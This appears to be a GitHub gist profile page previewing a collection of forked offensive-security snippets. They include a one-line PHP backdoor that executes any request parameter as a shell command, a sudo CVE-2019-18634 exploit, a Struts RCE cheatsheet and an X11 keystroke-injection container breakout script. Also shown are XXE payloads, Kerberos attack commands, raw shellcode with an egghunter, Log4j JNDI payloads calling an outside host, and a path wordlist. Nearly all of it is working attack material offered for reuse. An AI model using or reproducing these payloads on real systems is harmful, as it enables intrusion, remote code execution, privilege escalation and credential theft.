Skip to content

Instantly share code, notes, and snippets.

View rwincey's full-sized avatar

rwincey

70 followers · 1 following
View GitHub Profile
@rwincey
rwincey / Simple-Backdoor-One-Liner.php
Created December 5, 2019 15:38 — forked from sente/Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@rwincey
rwincey / CVE-2019-18634.py
Created February 16, 2020 12:15 — forked from wbowling/CVE-2019-18634.py
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@rwincey
rwincey / struts-cheatsheet.md
Created October 15, 2020 12:21 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

Then the middleware will be handling additional parameters passed to every function invocation.

Testing for Struts devMode enabled

@rwincey
rwincey / awk_netstat.sh
Created January 21, 2021 14:58 — forked from staaldraad/awk_netstat.sh
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@rwincey
rwincey / x11.py
Created January 21, 2021 14:59 — forked from staaldraad/x11.py
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
#!/usr/bin/python
"""
Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes.
Created by: [email protected]
Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb
Borrowed heavily from the original metasploit module. Thanks!
"""
from socket import *
import subprocess
@rwincey
rwincey / XXE_payloads
Created January 21, 2021 21:33 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@rwincey
rwincey / kerberos_attacks_cheatsheet.md
Created September 17, 2021 15:26 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@rwincey
rwincey / shellcode.py
Created September 26, 2021 15:11 — forked from YiChenChai/shellcode.py
egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6"
buf = ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += "\x41\x51\x
@rwincey
rwincey / Log4j Payloads
Created December 12, 2021 22:58 — forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://l4j.zsec.uk/sploit}
${jndi:rmi://l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit}
@rwincey
rwincey / ExploitDB.txt
Created July 12, 2022 03:35 — forked from vijay922/ExploitDB.txt
frs/admin/qrs.php
__admin
__cache/
__index.php
__MACOSX
__pma___
__SQL
__test.php
_.htpasswd
_adm